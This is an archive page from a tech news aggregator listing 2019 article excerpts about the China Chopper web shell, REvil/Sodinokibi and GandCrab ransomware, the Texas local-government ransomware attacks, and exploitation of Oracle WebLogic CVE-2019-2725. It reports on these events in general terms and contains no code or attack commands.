Sodinokibi – Page 7 – WindowsTechs.com

‘China Chopper’ web shell makes a comeback in Lebanon, other Asian countries

Posted on August 27, 2019 by Shannon Vavra

Malicious code first discovered nine years ago that has historically been used by groups associated with Chinese state-backed hacks has made a comeback, according to new research from Cisco’s Security and Intelligence Research Group, Talos. The hacking tool is web shell known as China Chopper. A web shell is a script that allows attackers to remotely access servers running web applications. This particular web shell has long been known to be an exploit that’s often impervious to being outed and detected. “China Chopper is a slick little web shell that does not get enough exposure and credit for its stealth,” FireEye researchers wrote in 2013 in their blog on the matter. China Chopper’s code as historically been small, according to security researcher Keith Tyler, who wrote on the tool in 2012. That much appears to be the same now — Talos researchers note the most recent campaign has been “extremely simple,” containing just one […]

The post ‘China Chopper’ web shell makes a comeback in Lebanon, other Asian countries appeared first on CyberScoop.

Continue reading ‘China Chopper’ web shell makes a comeback in Lebanon, other Asian countries→

Texas Does Ransomware Bigger: 23 Local Gov’ts Attacked

Posted on August 19, 2019 by Richi Jennings

Another week, another 23 local governments crippled by ransomware, in what appears to be a coordinated attack.
The post Texas Does Ransomware Bigger: 23 Local Gov’ts Attacked appeared first on Security Boulevard.
Continue reading Texas Does Ransomware Bigger: 23 Local Gov’ts Attacked→

Is ‘REvil’ the New GandCrab Ransomware?

Posted on July 15, 2019 by BrianKrebs

The cybercriminals behind the GandCrab ransomware-as-a-service (RaaS) offering recently announced they were closing up shop and retiring after having allegedly earned more than $2 billion in extortion payments from victims. But a growing body of evidence suggests the GandCrab team have instead quietly regrouped behind a more exclusive and advanced ransomware program known variously as “REvil,” “Sodin,” and “Sodinokibi.” Continue reading Is ‘REvil’ the New GandCrab Ransomware?→

Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig

Posted on May 6, 2019 by Tara Seals

Snowballing attacks using a recently patched critical bug show no sign of abating. Continue reading Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig→

Meet Sodinokibi, a ransomware strain that exploits a critical Oracle server flaw

Posted on April 30, 2019 by Jeff Stone

Hackers are exploiting a critical vulnerability in a widely used Oracle service to distribute a new strain of ransomware that attempts to encrypt data in a user’s directory, then make recovery more difficult by deleting trustworthy backups, according to research published Tuesday. Attackers are trying to infect victims with a new variant of the Sodinokibi ransomware by leveraging a known security flaw in Oracle’s WebLogic Server, according to Cisco’s Talos threat research team. The digital extortionists are exploiting the flaw known as CVE-2019-2725, a bug with a severity score of 9.8 out of 10 that Oracle sought to squash with a patch issued April 26, outside the company’s normal patch cycle. “Historically, most varieties of ransomware have required some form of user interaction, such as a user opening an attachment to an email message, clicking on a malicious link, or running a piece of malware on the device,” Cisco’s Talos […]

The post Meet Sodinokibi, a ransomware strain that exploits a critical Oracle server flaw appeared first on CyberScoop.

Continue reading Meet Sodinokibi, a ransomware strain that exploits a critical Oracle server flaw→